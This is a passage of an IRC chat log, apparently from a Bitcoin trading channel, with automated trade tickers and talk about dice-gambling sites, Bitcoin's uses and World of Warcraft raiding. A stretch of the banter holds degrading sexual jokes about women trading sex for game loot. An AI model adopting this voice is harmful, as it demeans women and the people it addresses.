away. Jun 25 19:27:46 [BTCTC] [DMS.PURCHASE] 1 @ 0.053891 BTC [-] Jun 25 19:29:21 what is just-dice Jun 25 19:29:26 you guys keep saying it Jun 25 19:29:35 try .com Jun 25 19:30:10 ok it's a SD knockoff Jun 25 19:30:17 so Jun 25 19:31:20 you can invest in it directly Jun 25 19:31:29 into the pool Jun 25 19:31:30 howso Jun 25 19:31:39 click Invest I imagine Jun 25 19:31:44 oic Jun 25 19:32:23 i'm not sure why i care about a some dice scam Jun 25 19:32:30 websites steal bitcoins Jun 25 19:33:01 you dont have to care Jun 25 19:33:40 [BTCTC] [S.DICE-PT] 10 @ 0.00225 = 0.0225 BTC [+] Jun 25 19:33:43 [BTCTC] [ASICMINER-PT] 1 @ 3.420009 BTC [+] Jun 25 19:33:52 it just exists, for people who want to use it, or people that want to invest in taking money from them Jun 25 19:33:53 [BTCTC] [S.DICE-PT] 200 @ 0.002299 = 0.4598 BTC [+] Jun 25 19:34:22 oic it's dooglus Jun 25 19:34:23 [BTCTC] [ASICMINER-PT] 1 @ 3.420008 BTC [-] Jun 25 19:34:24 gambling has been so far the one area where bitcoin brought actual innovation. Jun 25 19:34:26 that's neat then Jun 25 19:34:36 contrary to what people think, the one place where we completely own irl is gambling. Jun 25 19:34:45 nobody else can compete with the edges and with the PF. Jun 25 19:35:04 in spite of all the aggitation around payment processing, which is going remarkably repeatedly nowhere., Jun 25 19:35:22 [BTCTC] [ASICMINER-PT] 1 @ 3.420001 BTC [-] Jun 25 19:35:37 [HAVELOCK] [HIM] 1 @ 0.259999 BTC [+] Jun 25 19:36:06 i'm fine with now based who runs it Jun 25 19:36:13 [BTCTC] [ASICMINER-PT] 1 @ 3.42 BTC [-] Jun 25 19:36:29 yeah... it's what we thought last year. Jun 25 19:36:45 pffft Jun 25 19:37:24 payments space is going to be the uber struggle Jun 25 19:37:45 [BTCTC] [ASICMINER-PT] 1 @ 3.4125 BTC [-] Jun 25 19:37:47 [BTCTC] [ASICMINER-PT] 1 @ 3.411 BTC [-] Jun 25 19:37:49 [BTCTC] [ASICMINER-PT] 3 @ 3.41 = 10.23 BTC [-] Jun 25 19:38:23 [BTCTC] [ASICMINER-PT] 1 @ 3.3911 BTC [-] Jun 25 19:39:51 [BTCTC] [ASICMINER-PT] 1 @ 2.7 BTC [-] Jun 25 19:40:04 [BTCTC] [ASICMINER-PT] 1 @ 3.3911 BTC [+] Jun 25 19:40:16 it's not happening. bitcoin srsly is not for payments. Jun 25 19:40:35 [BTCTC] [DMS.PURCHASE] 200 @ 0.053891 = 10.7782 BTC [-] Jun 25 19:41:06 whats it for? Jun 25 19:41:15 so far the one thing we're doing right is gambling. Jun 25 19:41:24 scams? Jun 25 19:41:24 but otherwise, what bitcoin comes to supplant is the fed system Jun 25 19:41:32 ie, partitioning the gold back and forth among vaults Jun 25 19:41:35 faster cheaper better Jun 25 19:41:39 that's not payments. Jun 25 19:41:48 [BTCTC] [ASICMINER-PT] 1 @ 2.88 BTC [-] Jun 25 19:41:59 [BTCTC] [ASICMINER-PT] 1 @ 3.39 BTC [+] Jun 25 19:42:16 perhaps one day we'll actually do loc too. Jun 25 19:42:18 [BTCTC] [ASICMINER-PT] 1 @ 2.88 BTC [-] Jun 25 19:42:19 that day isn't here yet. Jun 25 19:42:38 [BTCTC] [ASICMINER-PT] 1 @ 3.39 BTC [+] Jun 25 19:42:46 [BTCTC] [ASICMINER-PT] 1 @ 2.88 BTC [-] Jun 25 19:42:55 [BTCTC] [ASICMINER-PT] 1 @ 3.39 BTC [+] Jun 25 19:43:00 [BTCTC] [ASICMINER-PT] 1 @ 2.88 BTC [-] Jun 25 19:43:12 so would you call it a store of value Jun 25 19:43:17 [BTCTC] [ASICMINER-PT] 1 @ 3.342 BTC [+] Jun 25 19:43:27 [BTCTC] [ASICMINER-PT] 1 @ 2.88 BTC [-] Jun 25 19:43:37 or just a mechanism? Jun 25 19:43:39 [BTCTC] [ASICMINER-PT] 1 @ 3.3421 BTC [+] Jun 25 19:43:48 http://trilema.com/2012/what-are-the-bitcoin-market-drivers/ Jun 25 19:43:50 What are the Bitcoin market drivers ? pe Trilema - Un blog de Mircea Popescu. Jun 25 19:43:52 [BTCTC] [ASICMINER-PT] 1 @ 2.88 BTC [-] Jun 25 19:43:53 six months ago. little has changed. Jun 25 19:44:03 [BTCTC] [ASICMINER-PT] 1 @ 3.3421 BTC [+] Jun 25 19:44:25 SatoshiDICE cleared something on the level of 15k so far this year. On yearly-adjusted figures (since “this year” only means about 6 months) and accounting for variance that would be about 25k yearly. Jun 25 19:44:26 [BTCTC] [ASICMINER-PT] 1 @ 2.88 BTC [-] Jun 25 19:44:30 that year turned out to be like 80k instead. Jun 25 19:44:40 [BTCTC] [ASICMINER-PT] 1 @ 3.3421 BTC [+] Jun 25 19:45:20 [BTCTC] [ASICMINER-PT] 1 @ 3.459999 BTC [+] Jun 25 19:45:36 [BTCTC] [ASICMINER-PT] 2 @ 2.88 = 5.76 BTC [-] Jun 25 19:46:45 [HAVELOCK] [ASICM] 140 @ 0.034 = 4.76 BTC [+] Jun 25 19:46:52 feels like bitcoin exists mostly unto itself these days Jun 25 19:46:59 mining, investing in mining Jun 25 19:47:17 i dont like it Jun 25 19:47:21 me enither Jun 25 19:47:41 the asciminer situation seems completely gamable Jun 25 19:47:58 [BTCTC] [TAT.ASICMINER] 36 @ 0.0343 = 1.2348 BTC [+] Jun 25 19:47:58 so it does. Jun 25 19:48:52 i think i read shareholders can buy usb miners at a cheaper price and pay 15 days late Jun 25 19:48:55 " I am sure Bitcoin gambling sites are VERY profitable. Jun 25 19:48:55 I want to start one, Don't know how to make one of thsese sites tho." Jun 25 19:49:04 so there's going to be a holdover on those profits Jun 25 19:49:06 or some Jun 25 19:49:17 mp you should get Gyft.com to IPO with you Jun 25 19:49:28 DU IT Jun 25 19:50:30 they don't take btc do they ? Jun 25 19:50:54 nah, this is one of those "website-and-advertising" made to scam vcs things. Jun 25 19:51:08 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.005009 = 0.1503 BTC [-] Jun 25 19:51:25 they take btc Jun 25 19:51:28 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.005008 = 0.2504 BTC [-] Jun 25 19:51:36 they need to offer more gift card types Jun 25 19:52:57 i wonder how they prevent turning into a defacto btc trade site then Jun 25 19:53:07 no idea Jun 25 19:53:17 but they are the largest provider of TE Jun 25 19:53:56 [BTCTC] [TAT.ASICMINER] 50 @ 0.0343 = 1.715 BTC [+] Jun 25 19:54:12 I think likely the most successful bitcoin accepting business Jun 25 19:54:18 guessing Jun 25 19:54:29 but they are certainly selling something bitcoiners want Jun 25 19:54:58 hm Jun 25 19:55:26 World of Warcraft Powerleveling for BTC!!!! Jun 25 19:55:51 you mean that's not been done yet? Jun 25 19:55:58 people still play WoW? Jun 25 19:56:22 i used to pro raid, it started fun, but became torture Jun 25 19:56:29 well Jun 25 19:56:39 not pro as i wasnt paid Jun 25 19:56:50 but in high-rabnking guild Jun 25 19:56:55 TAT: guid? Jun 25 19:56:59 +l Jun 25 19:57:04 what were they called Jun 25 19:57:09 I don't play games, period. Total lifetime gaming is about 50 hours, counting card games Jun 25 19:57:13 lemme look it up Jun 25 19:57:25 i jumped around towards the end Jun 25 19:57:54 [BTCTC] [ASICMINER-PT] 3 @ 3.36 = 10.08 BTC [+] Jun 25 19:57:56 [BTCTC] [ASICMINER-PT] 1 @ 3.350001 BTC [-] Jun 25 19:57:58 [BTCTC] [ASICMINER-PT] 3 @ 3.35 = 10.05 BTC [-] Jun 25 19:58:00 [BTCTC] [ASICMINER-PT] 4 @ 3.3421 = 13.3684 BTC [-] Jun 25 19:58:02 [BTCTC] [ASICMINER-PT] 13 @ 3.342 = 43.446 BTC [-] Jun 25 19:58:10 Pure Jun 25 19:58:28 was the highest one I was in Jun 25 19:58:29 pff probably trash top 100 :p Jun 25 19:58:48 hehe Jun 25 19:58:52 [BTCTC] [ASICMINER-PT] 2 @ 3.342 = 6.684 BTC [-] Jun 25 19:59:16 [BTCTC] [ASICMINER-PT] 2 @ 2.88 = 5.76 BTC [-] Jun 25 19:59:21 it was like being in the military Jun 25 19:59:23 not for me Jun 25 19:59:26 [BTCTC] [ASICMINER-PT] 2 @ 3.342 = 6.684 BTC [+] Jun 25 19:59:30 [HAVELOCK] [HIM] 17 @ 0.259999 = 4.42 BTC [+] Jun 25 19:59:35 [BTCTC] [ASICMINER-PT] 3 @ 2.88 = 8.64 BTC [-] Jun 25 19:59:46 [BTCTC] [ASICMINER-PT] 3 @ 3.342 = 10.026 BTC [+] Jun 25 19:59:57 you were probably an unholy DK Jun 25 19:59:59 ezmode much? Jun 25 20:01:08 at that time i was a tree Jun 25 20:01:23 lol Jun 25 20:01:24 before that i was a rogue Jun 25 20:01:41 never DK'd Jun 25 20:01:57 [BTCTC] [S.MPOE-PT] 3 @ 0.00078 = 0.0023 BTC [+] Jun 25 20:02:10 this was BC-WotLK Jun 25 20:02:26 i quit around the Arena raid Jun 25 20:02:31 such garbage Jun 25 20:02:34 BTC = best fun I've had in a game Jun 25 20:02:38 TBC* Jun 25 20:02:49 yeah Jun 25 20:02:52 then it all went downhill from there Jun 25 20:03:03 i enjoyed TBC too, quit after that Jun 25 20:03:22 i solo'd getting my whatchamacallit Jun 25 20:03:35 the process that lets you endgame raid Jun 25 20:03:39 the shards or whatever Jun 25 20:03:43 that was the most fun i had Jun 25 20:04:12 my felguard was da shit, i remmeber getting jumped by a group of 4 ~same level as me when i was soloing some quests working through BTC, and i pwned them all Jun 25 20:04:16 then they nerfed the felguard :p Jun 25 20:04:28 *TBC Jun 25 20:04:32 dammit. TBC is hard to type Jun 25 20:04:34 so used to BTC Jun 25 20:04:59 i dabbled in Rogue Tanking while it was possible too Jun 25 20:05:02 fun stuff Jun 25 20:05:03 hehe Jun 25 20:05:13 black temple, sunwell Jun 25 20:05:15 nuff said Jun 25 20:05:30 good times Jun 25 20:05:35 i never cleared sunwell Jun 25 20:05:40 was in shitty guild Jun 25 20:05:41 got world 1st kil'jaeden Jun 25 20:05:46 nice Jun 25 20:06:07 oh man i got passed over for glaives Jun 25 20:06:09 the drama Jun 25 20:06:13 lol Jun 25 20:06:20 by warriors? Jun 25 20:06:28 "cry more rogue lol" Jun 25 20:06:32 nah, an officer that never showed up Jun 25 20:06:43 i ended up becoming guild leader Jun 25 20:06:50 never got my glaives tho Jun 25 20:07:41 ultimate epeen Jun 25 20:08:06 coolest weapon after ashbringer Jun 25 20:08:14 loot was such a nightmare Jun 25 20:08:24 easily the worst part of running a guild Jun 25 20:08:39 BTC = best fun I've had in a game <<< QFT! Jun 25 20:08:53 [MPEX] [S.MPOE] 76 @ 0.00078751 = 0.0599 BTC [+] Jun 25 20:09:03 well try playing in a top guild with not much drama, DKP wasn't even needed Jun 25 20:09:05 [MPEX] [S.MPOE] 2024 @ 0.00078891 = 1.5968 BTC [+] Jun 25 20:09:22 because everyone understood how shit has to go down in order to get firsts Jun 25 20:09:34 yeah Jun 25 20:10:03 with that said there was still the girl that fucked an officer to get moar loot Jun 25 20:10:07 every now and then Jun 25 20:10:09 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005696 BTC [+] Jun 25 20:10:36 good guilds have a gangbang clause Jun 25 20:10:53 (chicks that want more loot show up for chick saturday in high heels only, do all the officers) Jun 25 20:11:13 high heels why? Jun 25 20:11:29 [BTCTC] [ASICMINER-PT] 3 @ 2.88 = 8.64 BTC [-] Jun 25 20:11:41 [BTCTC] [ASICMINER-PT] 3 @ 3.36687 = 10.1006 BTC [+] Jun 25 20:11:45 hunters are the best Jun 25 20:12:02 blood elf prolly Jun 25 20:12:15 [BTCTC] [ASICMINER-PT] 4 @ 2.88 = 11.52 BTC [-] Jun 25 20:12:26 [BTCTC] [ASICMINER-PT] 4 @ 3.36687 = 13.4675 BTC [+] Jun 25 20:12:31 i used to love kiting strong people Jun 25 20:12:44 Scrat easier to fuck standing ? Jun 25 20:12:47 [BTCTC] [ASICMINER-PT] 4 @ 2.88 = 11.52 BTC [-] Jun 25 20:12:51 http://www.mnn.com/earth-matters/space/stories/black-holes-are-portals-to-other-universes-according-to-new-quantum Jun 25 20:13:01 how is this new quantum. Jun 25 20:13:02 mp: but can't see feet Jun 25 20:13:05 i cannot speak for the rep of that website Jun 25 20:13:05 [BTCTC] [ASICMINER-PT] 3 @ 3.36687 = 10.1006 BTC [+] Jun 25 20:13:27 Scrat well you're too high level Jun 25 20:13:32 [BTCTC] [ASICMINER-PT] 1 @ 3.34213 BTC [-] Jun 25 20:14:47 mjr_1: well fuck you (hated good hunters as a melee class) Jun 25 20:14:59 [BTCTC] [BASIC-MINING] 1 @ 1.549997 BTC [-] Jun 25 20:15:01 [BTCTC] [BASIC-MINING] 1 @ 1.55 BTC [+] Jun 25 20:15:12 many keyboards were smashed Jun 25 20:15:50 i have an n52 collecting dust somewhere Jun 25 20:16:06 also best trolling class in 5s Jun 25 20:16:14 lol misdirection, fd, aspect of the daze Jun 25 20:17:20 http://eu.battle.net/wow/en/forum/topic/7426615726 Jun 25 20:17:23 daze cry more :D Jun 25 20:18:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.0343 BTC [+] Jun 25 20:19:23 [BTCTC] [DMS.PURCHASE] 146 @ 0.053891 = 7.8681 BTC [-] Jun 25 20:19:54 "What they found was far different from what happens according to general relativity alone: there was no singularity. Instead, just as the black hole began to squeeze tight, it suddenly loosened its grip again, as if a door was being opened." Jun 25 20:20:00 that is not as if a door was being opened Jun 25 20:20:11 that is as if fucking is going on. Jun 25 20:21:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.0343 BTC [+] Jun 25 20:21:56 and how did they find this? Jun 25 20:22:01 yes, theoretical physicists can learn a lot from kim kardashian's poon Jun 25 20:22:02 who put his dick in? Jun 25 20:23:03 [BTCTC] [ASICMINER-PT] 3 @ 3 = 9 BTC [-] Jun 25 20:23:20 [BTCTC] [ASICMINER-PT] 3 @ 3.36687 = 10.1006 BTC [+] Jun 25 20:25:03 should be renamed to philosophy, this shit is so far out of the realm of testability Jun 25 20:26:22 who! who who! Jun 25 20:26:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.0343 BTC [+] Jun 25 20:26:26 whooo put their diiick in! Jun 25 20:26:54 [BTCTC] [ASICMINER-PT] 5 @ 3 = 15 BTC [-] Jun 25 20:27:10 [BTCTC] [ASICMINER-PT] 5 @ 3.34215 = 16.7108 BTC [+] Jun 25 20:27:35 [BTCTC] [BTC-BOND] 326 @ 0.009998 = 3.2593 BTC [+] Jun 25 20:28:17 [BTCTC] [ASICMINER-PT] 4 @ 3 = 12 BTC [-] Jun 25 20:28:56 [BTCTC] [ASICMINER-PT] 1 @ 3.342152 BTC [+] Jun 25 20:29:50 [BTCTC] [ASICMINER-PT] 1 @ 3.342151 BTC [-] Jun 25 20:30:15 [BTCTC] [ASICMINER-PT] 1 @ 3.342151 BTC [-] Jun 25 20:30:28 [BTCTC] [ASICMINER-PT] 1 @ 3.342151 BTC [-] Jun 25 20:30:46 [BTCTC] [DMS.MINING] 4 @ 0.019981 = 0.0799 BTC [+] Jun 25 20:30:55 [BTCTC] [DMS.MINING] 20 @ 0.019985 = 0.3997 BTC [+] Jun 25 20:30:56 [BTCTC] [DMS.MINING] 50 @ 0.02 = 1 BTC [+] Jun 25 20:31:33 [BTCTC] [ASICMINER-PT] 5 @ 3 = 15 BTC [-] Jun 25 20:31:50 [BTCTC] [ASICMINER-PT] 2 @ 3.342151 = 6.6843 BTC [+] Jun 25 20:31:51 [BTCTC] [ASICMINER-PT] 3 @ 3.34213 = 10.0264 BTC [-] Jun 25 20:32:07 [BTCTC] [ASICMINER-PT] 5 @ 3 = 15 BTC [-] Jun 25 20:32:19 [BTCTC] [ASICMINER-PT] 1 @ 3.34213 BTC [+] Jun 25 20:32:37 [BTCTC] [B.YABMC] 10 @ 0.0077 = 0.077 BTC [-] Jun 25 20:32:39 [BTCTC] [B.YABMC] 73 @ 0.008 = 0.584 BTC [+] Jun 25 20:33:25 [BTCTC] [ASICMINER-PT] 4 @ 3.3401 = 13.3604 BTC [-] Jun 25 20:35:11 [BTCTC] [TAT.VIRTUALMINE] 29 @ 0.00567 = 0.1644 BTC [-] Jun 25 20:35:12 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.005679 = 0.284 BTC [+] Jun 25 20:35:14 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0057 BTC [+] Jun 25 20:35:15 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00575 = 0.575 BTC [+] Jun 25 20:35:16 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0058 BTC [+] Jun 25 20:35:17 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0059 BTC [+] Jun 25 20:35:18 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006 BTC [+] Jun 25 20:35:19 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0061 BTC [+] Jun 25 20:35:20 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.006249 = 0.0312 BTC [+] Jun 25 20:35:21 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.006249 = 0.6249 BTC [+] Jun 25 20:35:22 [BTCTC] [TAT.VIRTUALMINE] 850 @ 0.00625 = 5.3125 BTC [+] Jun 25 20:35:29 again?! Jun 25 20:36:39 [BTCTC] [PAJKA.BOND] 1 @ 0.06228 BTC [+] Jun 25 20:36:40 [BTCTC] [PAJKA.BOND] 10 @ 0.062288 = 0.6229 BTC [+] Jun 25 20:36:42 [BTCTC] [PAJKA.BOND] 15 @ 0.062289 = 0.9343 BTC [+] Jun 25 20:36:43 [BTCTC] [PAJKA.BOND] 1 @ 0.06235 BTC [+] Jun 25 20:36:44 [BTCTC] [PAJKA.BOND] 1 @ 0.06252 BTC [+] Jun 25 20:36:45 [BTCTC] [PAJKA.BOND] 10 @ 0.065 = 0.65 BTC [+] Jun 25 20:36:46 [BTCTC] [PAJKA.BOND] 10 @ 0.065 = 0.65 BTC [+] Jun 25 20:36:47 [BTCTC] [PAJKA.BOND] 1 @ 0.065 BTC [+] Jun 25 20:36:48 [BTCTC] [PAJKA.BOND] 2 @ 0.068693 = 0.1374 BTC [+] Jun 25 20:37:15 lol Jun 25 20:37:24 panjka is a pmb too Jun 25 20:37:31 pajka Jun 25 20:38:01 [BTCTC] [TAT.VIRTUALMINE] 47 @ 0.00615 = 0.2891 BTC [-] Jun 25 20:42:25 [BTCTC] [DMS.MINING] 146 @ 0.02 = 2.92 BTC [+] Jun 25 20:42:27 [BTCTC] [ASICMINER-PT] 4 @ 3.1 = 12.4 BTC [-] Jun 25 20:42:28 [BTCTC] [DMS.MINING] 4 @ 0.020468 = 0.0819 BTC [+] Jun 25 20:42:29 [BTCTC] [DMS.MINING] 1 @ 0.020469 BTC [+] Jun 25 20:42:30 [BTCTC] [DMS.MINING] 20 @ 0.02047 = 0.4094 BTC [+] Jun 25 20:42:32 [BTCTC] [DMS.MINING] 1 @ 0.02047 BTC [+] Jun 25 20:42:33 [BTCTC] [DMS.MINING] 63 @ 0.0205 = 1.2915 BTC [+] Jun 25 20:42:34 [BTCTC] [DMS.MINING] 19 @ 0.021 = 0.399 BTC [+] Jun 25 20:42:34 [BTCTC] [DMS.MINING] 86 @ 0.02199 = 1.8911 BTC [+] Jun 25 20:42:42 [BTCTC] [ASICMINER-PT] 4 @ 3.3401 = 13.3604 BTC [+] Jun 25 20:51:18 [HAVELOCK] [ASICM] 2 @ 0.034 = 0.068 BTC [+] Jun 25 20:52:52 [BTCTC] [DMS.PURCHASE] 1 @ 0.053891 BTC [-] Jun 25 20:53:14 [BTCTC] [ASICMINER-PT] 2 @ 3.449753 = 6.8995 BTC [+] Jun 25 20:53:16 [BTCTC] [ASICMINER-PT] 1 @ 3.449754 BTC [+] Jun 25 20:59:52 [HAVELOCK] [ASICM] 75 @ 0.03443 = 2.5823 BTC [+] Jun 25 21:00:10 [HAVELOCK] [ASICM] 3 @ 0.03443 = 0.1033 BTC [+] Jun 25 21:00:22 [HAVELOCK] [ASICM] 3 @ 0.03443 = 0.1033 BTC [+] Jun 25 21:07:12 [HAVELOCK] [HIM] 4 @ 0.26 = 1.04 BTC [+] Jun 25 21:11:17 [BTCTC] [BITVPS] 25 @ 0.0014 = 0.035 BTC [-] Jun 25 21:17:15 [BTCTC] [DMS.MINING] 40 @ 0.021001 = 0.84 BTC [-] Jun 25 21:19:36 [BTCTC] [TAT.ASICMINER] 5 @ 0.0342 = 0.171 BTC [-] Jun 25 21:19:37 [BTCTC] [TAT.ASICMINER] 4 @ 0.0341 = 0.1364 BTC [-] Jun 25 21:19:39 [BTCTC] [TAT.ASICMINER] 17 @ 0.03402 = 0.5783 BTC [-] Jun 25 21:19:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.034018 = 0.068 BTC [-] Jun 25 21:19:43 [BTCTC] [TAT.ASICMINER] 7 @ 0.03401 = 0.2381 BTC [-] Jun 25 21:19:44 [BTCTC] [TAT.ASICMINER] 4 @ 0.03401 = 0.136 BTC [-] Jun 25 21:19:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.034 BTC [-] Jun 25 21:19:48 [BTCTC] [TAT.ASICMINER] 12 @ 0.034 = 0.408 BTC [-] Jun 25 21:19:49 [BTCTC] [TAT.ASICMINER] 51 @ 0.0337 = 1.7187 BTC [-] Jun 25 21:20:08 [BTCTC] [ASICMINER-PT] 1 @ 3.4498 BTC [+] Jun 25 21:24:32 [HAVELOCK] [ASICM] 280 @ 0.03429999 = 9.604 BTC [-] Jun 25 21:26:43 [BTCTC] [TAT.ASICMINER] 29 @ 0.033705 = 0.9774 BTC [+] Jun 25 21:26:44 [BTCTC] [TAT.ASICMINER] 50 @ 0.033704 = 1.6852 BTC [-] Jun 25 21:26:46 [BTCTC] [TAT.ASICMINER] 23 @ 0.033703 = 0.7752 BTC [-] Jun 25 21:27:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.033703 BTC [-] Jun 25 21:27:25 [BTCTC] [ASICMINER-PT] 1 @ 3.4498 BTC [+] Jun 25 21:27:30 [BTCTC] [DMS.PURCHASE] 10 @ 0.053891 = 0.5389 BTC [-] Jun 25 21:39:46 [BTCTC] [DMS.MINING] 1 @ 0.021 BTC [-] Jun 25 21:39:48 [BTCTC] [DMS.MINING] 9 @ 0.021 = 0.189 BTC [-] Jun 25 21:40:24 [BTCTC] [DMS.MINING] 11 @ 0.021 = 0.231 BTC [-] Jun 25 21:41:00 [BTCTC] [TAT.ASICMINER] 5 @ 0.028616 = 0.1431 BTC [-] Jun 25 21:41:15 [BTCTC] [TAT.ASICMINER] 5 @ 0.033704 = 0.1685 BTC [+] Jun 25 21:42:03 [BTCTC] [ASICMINER-PT] 1 @ 3.2 BTC [-] Jun 25 21:42:26 [BTCTC] [DMS.SELLING] 1 @ 0.03475 BTC [-] Jun 25 21:43:01 [BTCTC] [DMS.SELLING] 10 @ 0.033111 = 0.3311 BTC [-] Jun 25 21:44:57 [BTCTC] [S.MPOE-PT] 3 @ 0.000777 = 0.0023 BTC [-] Jun 25 21:45:41 [BTCTC] [DMS.MINING] 8 @ 0.020996 = 0.168 BTC [-] Jun 25 21:47:58 [BTCTC] [TAT.VIRTUALMINE] 150 @ 0.005026 = 0.7539 BTC [-] Jun 25 21:48:08 [BTCTC] [S.MPOE-PT] 3 @ 0.000777 = 0.0023 BTC [-] Jun 25 21:48:39 [BTCTC] [DMS.SELLING] 10 @ 0.034749 = 0.3475 BTC [+] Jun 25 21:48:41 [BTCTC] [DMS.SELLING] 19 @ 0.03475 = 0.6603 BTC [+] Jun 25 21:49:00 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.005025 = 0.2513 BTC [-] Jun 25 21:53:51 [BTCTC] [ASICMINER-PT] 1 @ 3.44 BTC [+] Jun 25 21:53:59 [BTCTC] [DMS.PURCHASE] 15 @ 0.053891 = 0.8084 BTC [-] Jun 25 21:55:54 [BTCTC] [ASICMINER-PT] 2 @ 3.407003 = 6.814 BTC [-] Jun 25 21:55:56 [BTCTC] [ASICMINER-PT] 1 @ 3.407 BTC [-] Jun 25 21:56:58 [BTCTC] [TAT.ASICMINER] 1 @ 0.034186 BTC [+] Jun 25 21:59:35 [HAVELOCK] [ASICM] 10 @ 0.0344 = 0.344 BTC [+] Jun 25 22:05:32 [BTCTC] [ASICMINER-PT] 1 @ 3.44899 BTC [+] Jun 25 22:05:34 [HAVELOCK] [ASICM] 29 @ 0.0344 = 0.9976 BTC [+] Jun 25 22:06:11 [BTCTC] [DMS.MINING] 15 @ 0.020051 = 0.3008 BTC [-] Jun 25 22:10:13 [HAVELOCK] [ASICM] 14 @ 0.03425 = 0.4795 BTC [-] Jun 25 22:13:05 [BTCTC] [TAT.ASICMINER] 5 @ 0.034171 = 0.1709 BTC [-] Jun 25 22:14:44 [HAVELOCK] [ASICM] 100 @ 0.03360003 = 3.36 BTC [-] Jun 25 22:16:24 [HAVELOCK] [ASICM] 140 @ 0.03360001 = 4.704 BTC [-] Jun 25 22:16:25 [HAVELOCK] [ASICM] 14 @ 0.03360001 = 0.4704 BTC [-] Jun 25 22:16:30 [BTCTC] [BITVPS] 100 @ 0.00131 = 0.131 BTC [-] Jun 25 22:16:55 [HAVELOCK] [VTX] 2 @ 0.425001 = 0.85 BTC [-] Jun 25 22:17:42 [BTCTC] [DMS.SELLING] 1 @ 0.033111 BTC [-] Jun 25 22:18:05 [BTCTC] [DMS.SELLING] 9 @ 0.033111 = 0.298 BTC [-] Jun 25 22:18:39 [BTCTC] [DMS.SELLING] 14 @ 0.03311 = 0.4635 BTC [-] Jun 25 22:18:51 [BTCTC] [TAT.VIRTUALMINE] 22 @ 0.005847 = 0.1286 BTC [+] Jun 25 22:19:25 [BTCTC] [BITVPS] 5 @ 0.00131 = 0.0066 BTC [-] Jun 25 22:20:09 [BTCTC] [RSM] 1 @ 0.021003 BTC [-] Jun 25 22:23:00 [BTCTC] [DMS.MINING] 2 @ 0.020984 = 0.042 BTC [+] Jun 25 22:26:58 [BTCTC] [ASICMINER-PT] 1 @ 3.371601 BTC [-] Jun 25 22:27:00 [BTCTC] [S.DICE-PT] 1 @ 0.00235 BTC [+] Jun 25 22:27:04 [BTCTC] [ASICMINER-PT] 1 @ 3.371202 BTC [-] Jun 25 22:27:09 [BTCTC] [ASICMINER-PT] 1 @ 3.371 BTC [-] Jun 25 22:27:34 [BTCTC] [ASICMINER-PT] 2 @ 3.371 = 6.742 BTC [-] Jun 25 22:27:39 [BTCTC] [ASICMINER-PT] 1 @ 3.2 BTC [-] Jun 25 22:28:07 [BTCTC] [ASICMINER-PT] 1 @ 3.370002 BTC [+] Jun 25 22:28:10 [BTCTC] [ASICMINER-PT] 1 @ 3.370001 BTC [-] Jun 25 22:30:55 [HAVELOCK] [ASICM] 16 @ 0.0336 = 0.5376 BTC [-] Jun 25 22:35:52 [BTCTC] [S.MPOE-PT] 366 @ 0.00078 = 0.2855 BTC [+] Jun 25 22:42:10 [BTCTC] [TAT.ASICMINER] 20 @ 0.034281 = 0.6856 BTC [+] Jun 25 22:42:12 [BTCTC] [TAT.ASICMINER] 19 @ 0.034282 = 0.6514 BTC [+] Jun 25 22:45:56 [BTCTC] [TAT.VIRTUALMINE] 24 @ 0.005818 = 0.1396 BTC [-] Jun 25 22:46:35 [BTCTC] [TAT.VIRTUALMINE] 46 @ 0.005209 = 0.2396 BTC [-] Jun 25 22:46:37 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.005207 = 0.2604 BTC [-] Jun 25 22:46:38 [BTCTC] [TAT.VIRTUALMINE] 54 @ 0.0052 = 0.2808 BTC [-] Jun 25 22:49:14 [BTCTC] [DMS.MINING] 1 @ 0.020957 BTC [-] Jun 25 22:49:46 [BTCTC] [TAT.ASICMINER] 14 @ 0.034282 = 0.4799 BTC [+] Jun 25 22:54:16 [BTCTC] [TAT.ASICMINER] 8 @ 0.034 = 0.272 BTC [-] Jun 25 22:55:26 lame, people you have ignored on the forum can pm you Jun 25 22:57:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.034 = 0.068 BTC [-] Jun 25 22:59:59 to each his own Jun 25 23:00:54 [HAVELOCK] [VTX] 3 @ 0.426 = 1.278 BTC [+] Jun 25 23:01:14 [HAVELOCK] [ASICM] 2 @ 0.0339 = 0.0678 BTC [+] Jun 25 23:01:58 [BTCTC] [ASICMINER-PT] 1 @ 3.371 BTC [+] Jun 25 23:02:13 [BTCTC] [ASICMINER-PT] 1 @ 3.2 BTC [-] Jun 25 23:02:34 [BTCTC] [ASICMINER-PT] 1 @ 3.3701 BTC [+] Jun 25 23:02:37 i dont ignore people that have something to say, even if i disagree Jun 25 23:02:43 just people that have nothing to say Jun 25 23:02:48 [BTCTC] [ASICMINER-PT] 1 @ 3.2 BTC [-] Jun 25 23:02:48 but think they do Jun 25 23:03:00 [BTCTC] [ASICMINER-PT] 1 @ 3.3701 BTC [+] Jun 25 23:03:22 in this information age, filters are my friend Jun 25 23:03:25 [BTCTC] [ASICMINER-PT] 1 @ 3.2 BTC [-] Jun 25 23:03:46 [BTCTC] [ASICMINER-PT] 1 @ 3.3701 BTC [+] Jun 25 23:04:09 which am i? Jun 25 23:04:41 which are you? Jun 25 23:04:50 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.005796 = 0.029 BTC [+] Jun 25 23:05:02 your theory is falling apart Jun 25 23:05:13 TAT: don't be cruel Jun 25 23:05:14 :) Jun 25 23:05:39 truffles is too fragile for that sort of talk Jun 25 23:05:42 only the super fragile think the internet is super cruel Jun 25 23:05:55 [BTCTC] [ASICMINER-PT] 4 @ 3.4 = 13.6 BTC 